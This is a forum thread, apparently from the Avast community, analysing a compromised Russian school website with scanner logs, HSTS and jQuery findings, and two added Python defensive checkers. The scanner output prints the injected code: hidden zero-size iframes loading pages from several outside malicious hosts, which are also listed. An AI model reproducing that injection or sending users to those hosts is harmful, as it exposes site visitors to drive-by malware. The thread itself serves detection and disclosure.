Author Topic: Instances of suspicious script flagged?


Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33915
  • malware fighter
Instances of suspicious script flagged?
« on: October 13, 2018, 08:32:42 PM »
See: https://urlquery.net/report/3cb59419-4b5a-42e7-b7e7-94978099b84a
Re line 206 etc.: https://aw-snap.info/file-viewer/?protocol=not-secure&ref_sel=GSP2&ua_sel=ff&chk-cache=&fs=1&tgt=d3d3LjE1MC1tXW5bbl0yLnsjdXNbdHsufXU%3D~enc
Security hint: -http://www.150-monino2.edusite.ru/_ext/comment.php?pid=47&title=�������&notify=yes
-> https://webhint.io/scanner/8a990e08-715f-4f88-a032-9106424a7aab
'strict-transport-security' header 'max-age' value should be more than 10886400

Consider for -http://www.150-monino2.edusite.ru

Scanner output:
Scanning -http://www.150-monino2.edusite.ru ...
Script loaded: -http://www.150-monino2.edusite.ru/menus.js
Script loaded: -http://rusobr.ru/count.php?sid=4719
{"date":"2018-10-13T18:24:37.810Z","timeout":"-http://188.165.163.235/index/api.php?sid=9Hbrbj_20O5TRHrR0aFL"}
{"date":"2018-10-13T18:24:37.811Z","timeout":"-http://211.227.18.92/page1.php"}
{"date":"2018-10-13T18:24:37.812Z","timeout":"-http://combach.com/gl1_2.php"}

No content returned for https://aw-snap.info/file-viewer/?protocol=not-secure&ref_sel=GSP2&ua_sel=ff&chk-cache=&fs=1&tgt=fXVzXWJ9Ln11YF5ddW50LnBocDxzWyM9NDcxOQ%3D%3D~enc

3 hints -> https://webhint.io/scanner/65d30a79-a7b5-4b20-8abd-f8124e282006

C-grade scan results 3: https://www.htbridge.com/ssl/?id=twjOeUxs. Consider the third-party content flagged in the scan.

polonus (volunteer 3rd party cold reconnaissance website security analyst & website error-hunter)
« Last Edit: October 13, 2018, 08:44:06 PM by polonus »
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!
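The webhint line above says the site's HSTS max-age must be more than 10886400 seconds (18 weeks). The following is an added example, not webhint's code, showing how a defender can evaluate a Strict-Transport-Security header value against that threshold offline; the header values at the bottom are constructed for the demo, and the includeSubDomains check is a stricter addition of this example rather than something the scan hint asked for.

```python
"""Evaluate a Strict-Transport-Security header value against the
threshold quoted by the webhint scan (max-age > 10886400 seconds).
Added example for this thread; it is not webhint's implementation."""
import re

WEBHINT_MIN_MAX_AGE = 10886400  # seconds (18 weeks), the value in the scan hint


def parse_hsts(value):
    """Split an HSTS value into ({directive: value-or-None}, [duplicates]).

    Directive names are case-insensitive (RFC 6797 section 6.1). A directive
    that appears twice makes the whole header invalid for browsers, so the
    duplicates are reported separately instead of silently overwritten.
    """
    directives, duplicates = {}, []
    for token in value.split(";"):
        token = token.strip()
        if not token:
            continue
        name, sep, val = token.partition("=")
        name = name.strip().lower()
        if name in directives:
            duplicates.append(name)
            continue
        # quoted-string values such as max-age="300" are allowed by the RFC
        directives[name] = val.strip().strip('"') if sep else None
    return directives, duplicates


def check_hsts(value, min_max_age=WEBHINT_MIN_MAX_AGE):
    """Return a list of finding strings; an empty list means the header
    passes every check made here."""
    if value is None:
        return ["no Strict-Transport-Security header sent"]
    directives, duplicates = parse_hsts(value)
    findings = [
        f"duplicate directive '{d}' (whole header is ignored by browsers)"
        for d in duplicates
    ]
    max_age = directives.get("max-age")
    if max_age is None or not re.fullmatch(r"[0-9]+", max_age):
        findings.append("max-age missing or not a non-negative integer")
    else:
        age = int(max_age)
        if age == 0:
            # max-age=0 instructs browsers to delete any stored policy
            findings.append("max-age=0 tells browsers to forget the HSTS policy")
        elif age <= min_max_age:
            findings.append(f"max-age {age} is not more than {min_max_age}")
    # Stricter than the scan hint: without includeSubDomains, subdomains
    # (and cookies scoped to them) stay reachable over plain HTTP.
    if "includesubdomains" not in directives:
        findings.append("includeSubDomains not set (subdomains stay unprotected)")
    return findings


if __name__ == "__main__":
    # Constructed sample header values, not captured from the scanned site.
    for sample in (None, "max-age=300", "max-age=0; includeSubDomains",
                   "max-age=31536000; includeSubDomains; preload"):
        print(repr(sample), "->", check_hsts(sample) or "OK")
```

A header that only just reaches 10886400 still fails, because the hint says "more than"; a header with a quoted max-age value is accepted, as the RFC grammar allows it.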

Offline polonus

Re: Instances of suspicious script flagged?
« Reply #1 on: October 13, 2018, 11:32:14 PM »
Error for the original scansite: error
Quote
-www.150-monino2.edusite.ru/
     status: (referer=-http:/XXX/web?q=puppies)saved 29164 bytes 54bdc21874d239391ae95fca66dc2b7e18ede260
     info: [script] -www.150-monino2.edusite.ru/menus.js
     info: [iframe] -188.165.163.235/index/api.php?sid=9H20O5TRHrR0aFL
     info: [img] -www.150-monino2.edusite.ru/images/gerbshkolyi.png
     info: [img] -www.150-monino2.edusite.ru/images/p47_izobrajenie.jpg
     info: [img] -www.150-monino2.edusite.ru/scin/logo.jpg
     info: [img] -www.150-monino2.edusite.ru/scin/sp.gif
     info: [script] -rusobr.ru/count.php?sid=4719
     info: [img] -rusobr.ru/banners/j120x60_01.jpg
     info: [img] -rating.rosnou.ru/images/baner160-60.gif
     info: [img] -www.150-monino2.edusite.ru/images/p81_bar7.gif
     info: [iframe] -www.150-monino2.edusite.ru/_ext/comment.php?47
     info: [img] -www.150-monino2.edusite.ru/_ext/pic.php
     info: [decodingLevel=0] found JavaScript
     error: undefined variable parseStylesheets
     error: undefined function parseStylesheets
     info: DecodedIframe detected
     info: [var g1] URL=-www.150-monino2.edusite.ru/
     info: [var newurl] URL=-www.150-monino2.edusite.ru/
     info: [iframe] -211.227.18.92/page1.php
     info: [iframe] -combach.com/gl1_2.php
     info: [iframe] -211.216.76.177/tag1.php
     info: [decodingLevel=1] found JavaScript
     error: line:15: SyntaxError: missing ; before statement:
          error: line:15: <iframe width="0" height="0" board="0" src="-http:/211.216.76.177/tag1.php"></iframe><iframe width="0" height="0" board="0" src="-http:/211.227.18.92/page1.php"></iframe><iframe width="0" height="0" board="0" src="-http:/combach.com/gl1_2.php"></iframe>
          error: line:15: ......................................................................................^
     file: 54bdc21874d239391ae95fca66dc2b7e18ede260: 29164 bytes
     file: 4075a225408928cf3042cd815bb2abce54fc2444: 938 bytes

For the C-grade detections mentioned in the scan results above, 2 vulnerable jQuery libraries were detected: https://retire.insecurity.today/#!/scan/6100a47a9e6b10fed97d3fe3c5351397cc1d0a2e3026c445306a86dfbed95849

Look for results here: https://www.htbridge.com/ssl/?id=MfD8LzCK
"The HTTP version of the website does not redirect to the HTTPS version. We advise to enable redirection".
Script error
Quote
[embed] -xenia.edusite.ru/js/fancybox/
     info: [decodingLevel=0] found JavaScript
     error: undefined variable jQuery
     error: undefined function $
     file: 1cf3d47b5ccb7cb6e9019c64f2a88d03a64853e4: 48706 bytes
&
 info: [script] -xenia.edusite.ru/scin/my.js
     info: [decodingLevel=0] found JavaScript
     error: undefined variable $
     error: undefined function $
     file: d989417ee36e7f01ad680a230f974d69253df8a5: 10733 bytes
&
info: ActiveXDataObjectsMDAC detected Microsoft.XMLHTTP
     info: [iframe] -xenia.edusite.ru/js/highslide/
     info: [decodingLevel=0] found JavaScript
     suspicious: maxruntime exceeded 10 seconds (incomplete)
 

To land at an improved website security infrastructure the use of 'best policies' is advised.
Everybody may prosper, website admin(s), hoster, and end-users alike.

That is why I do this. If only those responsible would take found hints and would follow recommendations proposed,
we would arrive at a much more secure world, where mutual trust could again be spelled with a big T. ;) :)

yours truly,

Damian aka polonus (volunteer website security analyst and website error-hunter)
« Last Edit: October 13, 2018, 11:54:00 PM by polonus »
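The decoded line 15 in the quote above is the classic injection pattern the scanner flagged: three 0x0 iframes pointing at hosts that have nothing to do with the school site. As an added example (not the scanner's code, and not from the original post), here is a small static check a site admin could run over a saved copy of a page to list hidden iframes and mark the ones that load off-site content. The HTML sample is constructed with RFC 5737 documentation addresses and a placeholder hostname; real injections are often written by a script at run time, so the same check should also be run over the browser-rendered DOM, not only the raw file.

```python
"""List hidden <iframe> elements in an HTML document and mark those that
load content from a host other than the page's own. Added example for
this thread; it is not the quoted scanner's implementation."""
from html.parser import HTMLParser
from urllib.parse import urlsplit


def _is_zero(value):
    """True for width/height attribute values such as '0', '0px' or ' 0 '."""
    if value is None:
        return False
    v = value.strip().lower()
    if v.endswith("px"):
        v = v[:-2].strip()
    return v == "0"


class IframeAuditor(HTMLParser):
    """Collects iframes that are hidden by size or CSS."""

    def __init__(self, page_host):
        super().__init__()
        self.page_host = page_host.lower()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":  # HTMLParser already lower-cases tag names
            return
        a = {name.lower(): val for name, val in attrs}
        hidden = []
        if _is_zero(a.get("width")) or _is_zero(a.get("height")):
            hidden.append("zero-size")
        style = (a.get("style") or "").replace(" ", "").lower()
        if "display:none" in style or "visibility:hidden" in style:
            hidden.append("css-hidden")
        if not hidden:
            return  # visible iframes (e.g. a comment widget) are not reported
        src = a.get("src") or ""
        host = (urlsplit(src).hostname or "").lower()
        # A relative src (no host) stays on the page's own origin.
        off_site = host if host and host != self.page_host else None
        self.findings.append({"src": src, "hidden": hidden, "off_site": off_site})


def audit_iframes(html, page_host):
    """Return a list of {src, hidden, off_site} dicts, one per hidden iframe."""
    parser = IframeAuditor(page_host)
    parser.feed(html)
    parser.close()
    return parser.findings


def hidden_offsite(findings):
    """The high-signal subset: hidden and pointing at a foreign host."""
    return [f for f in findings if f["off_site"]]


# Constructed sample modelled on the quoted scanner output; the hosts are
# RFC 5737 documentation addresses and a reserved placeholder name.
SAMPLE_HTML = """<html><body>
<p>School news</p>
<iframe width="0" height="0" border="0" src="http://198.51.100.7/tag1.php"></iframe>
<iframe width="0" height="0" border="0" src="http://203.0.113.9/page1.php"></iframe>
<iframe style="display: none" src="http://example.invalid/gl1_2.php"></iframe>
<iframe width="600" height="300" src="http://www.school.example/_ext/comment.php?47"></iframe>
<iframe width="0" height="0" src="/_ext/pic.php"></iframe>
</body></html>"""

if __name__ == "__main__":
    for f in audit_iframes(SAMPLE_HTML, "www.school.example"):
        flag = "OFF-SITE " + f["off_site"] if f["off_site"] else "same-site"
        print(f"{flag:28} {','.join(f['hidden']):12} {f['src']}")
```

The visible 600x300 comment iframe is not reported at all, and the zero-size same-origin tracking pixel is reported but not marked off-site; only the three hidden foreign iframes end up in the high-signal list, which matches what the scanner's "HTML:Iframe-inf" style detection is keyed on.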

Offline polonus

Re: Instances of suspicious script flagged?
« Reply #2 on: October 14, 2018, 12:28:00 AM »
Also consider 9 red out of 10 netcraft risk rating: https://toolbar.netcraft.com/site_report?url=http://211.227.18.92
and detections here: https://www.virustotal.com/#/ip-address/211.227.18.92

Conclusion: avast will detect "HTML:Iframe-inf" here, and we are being protected. ;)

polonus